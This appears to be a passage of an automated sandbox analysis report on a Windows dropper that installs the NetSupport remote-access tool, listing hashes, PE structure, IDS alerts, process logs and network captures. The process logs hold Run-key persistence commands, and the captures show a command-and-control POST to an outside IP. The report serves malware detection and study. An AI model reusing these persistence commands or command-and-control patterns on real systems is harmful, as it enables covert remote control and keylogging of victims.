Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\pcicapi.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Netstat\remcmdstub.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	77224
Entropy (8bit):	6.793971095882093
Encrypted:	false
SSDEEP:	1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
MD5:	325B65F171513086438952A152A747C4
SHA1:	A1D1C397902FF15C4929A03D582B09B35AA70FC0
SHA-256:	26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
SHA-512:	6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.\|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Netstat\shv.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	105848
Entropy (8bit):	4.68250265552195
Encrypted:	false
SSDEEP:	384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
MD5:	8D9709FF7D9C83BD376E01912C734F0A
SHA1:	E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
SHA-256:	49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
SHA-512:	042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\shv.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\loca[1].htm

Download File

Process:	C:\Users\Public\Netstat\shv.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	16
Entropy (8bit):	3.077819531114783
Encrypted:	false
SSDEEP:	3:llD:b
MD5:	C40449C13038365A3E45AB4D7F3C2F3E
SHA1:	CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
SHA-256:	1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
SHA-512:	3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
Malicious:	false
Preview:	40.7357,-74.1724

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.881035102524664
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'283'788 bytes
MD5:	a3cea314d888a08b79002656a9f4b927
SHA1:	396b9f96219785f0c80c69703dc623c23554affc
SHA256:	64356e6b4781925ef940695d869a826dc229e911919faf8729d8dfb34f31e61a
SHA512:	a279ce78302acb55f97181cf1bcd80982ca794995273af971c027fbb63b8ed7db14007ae0f84001d3a8b0502ca556cedb9ed4d6e95925bf853c2993f028b078d
SSDEEP:	49152:kDjlabwz9F+H1Zf8NNbTfvaw2EheBgtpsDf5Log8nUQkFG534txeqJ:0qwPk1ZfWhvcEhQGa178UnFdJ
TLSH:	CEB51209E3E909F5D0B7E53CCA668D02F77A7C5903309A8F23B0565A1F673A09E39761
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x140032ee0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x66409723 [Sun May 12 10:17:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	b1c5b1beabd90d9fdabd1df0779ea832

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F2368B75E38h
dec eax
add esp, 28h
jmp 00007F2368B757CFh
int3
int3
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+08h], ebx
dec eax
mov dword ptr [eax+10h], ebp
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
inc ecx
push esi
dec eax
sub esp, 20h
dec ebp
mov edx, dword ptr [ecx+38h]
dec eax
mov esi, edx
dec ebp
mov esi, eax
dec eax
mov ebp, ecx
dec ecx
mov edx, ecx
dec eax
mov ecx, esi
dec ecx
mov edi, ecx
inc ecx
mov ebx, dword ptr [edx]
dec eax
shl ebx, 04h
dec ecx
add ebx, edx
dec esp
lea eax, dword ptr [ebx+04h]
call 00007F2368B74C53h
mov eax, dword ptr [ebp+04h]
and al, 66h
neg al
mov eax, 00000001h
sbb edx, edx
neg edx
add edx, eax
test dword ptr [ebx+04h], edx
je 00007F2368B75963h
dec esp
mov ecx, edi
dec ebp
mov eax, esi
dec eax
mov edx, esi
dec eax
mov ecx, ebp
call 00007F2368B77977h
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov ebp, dword ptr [esp+38h]
dec eax
mov esi, dword ptr [esp+40h]
dec eax
mov edi, dword ptr [esp+48h]
dec eax
add esp, 20h
inc ecx
pop esi
ret
int3
int3
int3
dec eax
sub esp, 48h
dec eax
lea ecx, dword ptr [esp+20h]
call 00007F2368B641E3h
dec eax
lea edx, dword ptr [00025747h]
dec eax
lea ecx, dword ptr [esp+20h]
call 00007F2368B76A32h
int3
jmp 00007F2368B7CC14h
int3
int3
int3
int3
int3
int3

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x597a0	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x597d4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x70000	0xe360	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x6a000	0x306c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7f000	0x970	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x536c0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x53780	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4b3f0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x48000	0x508	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x588bc	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4676e	0x46800	f06bb06e02377ae8b223122e53be35c2	False	0.5372340425531915	data	6.47079645411382	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x48000	0x128c4	0x12a00	2de06d4a6920a6911e64ff20000ea72f	False	0.4499003775167785	data	5.273999097784603	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5b000	0xe75c	0x1a00	0dbdb901a7d477980097e42e511a94fb	False	0.28275240384615385	data	3.2571023907881185	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x6a000	0x306c	0x3200	b0ce0f057741ad2a4ef4717079fa34e9	False	0.483359375	data	5.501810413666288	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat	0x6e000	0x360	0x400	1fcc7b1d7a02443319f8fcc2be4ca936	False	0.2578125	data	3.0459938492946015	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA	0x6f000	0x15c	0x200	3f331ec50f09ba861beaf955b33712d5	False	0.408203125	data	3.3356393424384843	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x70000	0xe360	0xe400	2ce7b064b562668bb9f9675200fd1906	False	0.6302425986842105	data	6.596823435141548	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7f000	0x970	0xa00	77a9ddfc47a5650d6eebbcc823e39532	False	0.52421875	data	5.336289720085303	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x70680	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x711c8	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x72778	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x72ce0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x73588	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x74430	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x74898	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x75940	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x77ee8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x7c5b8	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x7c388	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x7c4c8	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x7c258	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x7bf20	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x7bcc8	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x7cf98	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x7d180	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x7d350	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x7d508	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x7d650	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x7dac0	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x7dc28	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x7dd80	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x7de90	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x7df50	0x1c0	data	English	United States	0.5178571428571429
RT_STRING	0x7e110	0x250	data	English	United States	0.44256756756756754
RT_GROUP_ICON	0x7bc60	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x7c840	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.39786666666666665

Imports

DLL	Import
KERNEL32.dll	LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T15:10:10.376773+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49708	45.61.128.74	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 15:10:19.136683941 CET	49708	443	192.168.2.6	45.61.128.74
Nov 25, 2024 15:10:19.136734962 CET	443	49708	45.61.128.74	192.168.2.6
Nov 25, 2024 15:10:19.136810064 CET	49708	443	192.168.2.6	45.61.128.74
Nov 25, 2024 15:10:19.369698048 CET	49708	443	192.168.2.6	45.61.128.74
Nov 25, 2024 15:10:19.369761944 CET	443	49708	45.61.128.74	192.168.2.6
Nov 25, 2024 15:10:19.369818926 CET	443	49708	45.61.128.74	192.168.2.6
Nov 25, 2024 15:10:20.133939028 CET	49709	80	192.168.2.6	104.26.0.231
Nov 25, 2024 15:10:20.257781029 CET	80	49709	104.26.0.231	192.168.2.6
Nov 25, 2024 15:10:20.258264065 CET	49709	80	192.168.2.6	104.26.0.231
Nov 25, 2024 15:10:20.258656979 CET	49709	80	192.168.2.6	104.26.0.231
Nov 25, 2024 15:10:20.381143093 CET	80	49709	104.26.0.231	192.168.2.6
Nov 25, 2024 15:10:21.664592981 CET	80	49709	104.26.0.231	192.168.2.6
Nov 25, 2024 15:10:21.664655924 CET	49709	80	192.168.2.6	104.26.0.231
Nov 25, 2024 15:12:09.953752041 CET	49709	80	192.168.2.6	104.26.0.231
Nov 25, 2024 15:12:10.074353933 CET	80	49709	104.26.0.231	192.168.2.6
Nov 25, 2024 15:12:10.075824022 CET	49709	80	192.168.2.6	104.26.0.231

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 15:10:19.987565994 CET	61178	53	192.168.2.6	1.1.1.1
Nov 25, 2024 15:10:20.128518105 CET	53	61178	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 15:10:19.987565994 CET	192.168.2.6	1.1.1.1	0xe5a	Standard query (0)	geo.netsupportsoftware.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 15:10:20.128518105 CET	1.1.1.1	192.168.2.6	0xe5a	No error (0)	geo.netsupportsoftware.com	104.26.0.231	A (IP address)	IN (0x0001)	false
Nov 25, 2024 15:10:20.128518105 CET	1.1.1.1	192.168.2.6	0xe5a	No error (0)	geo.netsupportsoftware.com	104.26.1.231	A (IP address)	IN (0x0001)	false
Nov 25, 2024 15:10:20.128518105 CET	1.1.1.1	192.168.2.6	0xe5a	No error (0)	geo.netsupportsoftware.com	172.67.68.212	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

45.61.128.74connection: keep-alivecmd=pollinfo=1ack=1

geo.netsupportsoftware.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49708	45.61.128.74	443	5552	C:\Users\Public\Netstat\shv.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 15:10:19.369698048 CET	216	OUT	POST http://45.61.128.74/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.61.128.74Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49709	104.26.0.231	80	5552	C:\Users\Public\Netstat\shv.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 15:10:20.258656979 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Nov 25, 2024 15:10:21.664592981 CET	967	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 14:10:21 GMT Content-Type: text/html; Charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8e8238c26c18728a-EWR CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: private Set-Cookie: ASPSESSIONIDCQRCRQBQ=BFBLMHACADDDDOIFGMKPCBBO; path=/ cf-apo-via: origin,host X-Frame-Options: SAMEORIGIN X-Powered-By: ASP.NET Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSVCf65P8D36UWnm6YIitQ%2FuvOOjwF%2BnLQxXxsmTL0zqoTl7yEO8SSJnaL%2BNSsHwL%2ByG00ecNy7iAYlTOmrmqoRZwsHC1yxgvmbA0cwOvOTndzaxWCXYAat2oyD%2FaQ6vLPyD7M4nN8pbzjwi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1995&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a Data Ascii: 1040.7357,-74.17240

Target ID:	0
Start time:	09:10:15
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x7ff70e780000
File size:	2'283'788 bytes
MD5 hash:	A3CEA314D888A08B79002656A9F4B927
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:10:16
Start date:	25/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Imagebase:	0x7ff645890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:10:16
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:10:16
Start date:	25/11/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Imagebase:	0x7ff632860000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:10:17
Start date:	25/11/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Imagebase:	0x7ff632860000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:10:17
Start date:	25/11/2024
Path:	C:\Users\Public\Netstat\shv.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Netstat\shv.exe
Imagebase:	0xab0000
File size:	105'848 bytes
MD5 hash:	8D9709FF7D9C83BD376E01912C734F0A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\shv.exe, Author: Joe Security
Antivirus matches:	Detection: 29%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	09:10:17
Start date:	25/11/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Imagebase:	0x7ff632860000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:10:18
Start date:	25/11/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Imagebase:	0x7ff632860000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:10:18
Start date:	25/11/2024
Path:	C:\Users\Public\Netstat\shv.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Netstat\shv.exe
Imagebase:	0xab0000
File size:	105'848 bytes
MD5 hash:	8D9709FF7D9C83BD376E01912C734F0A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
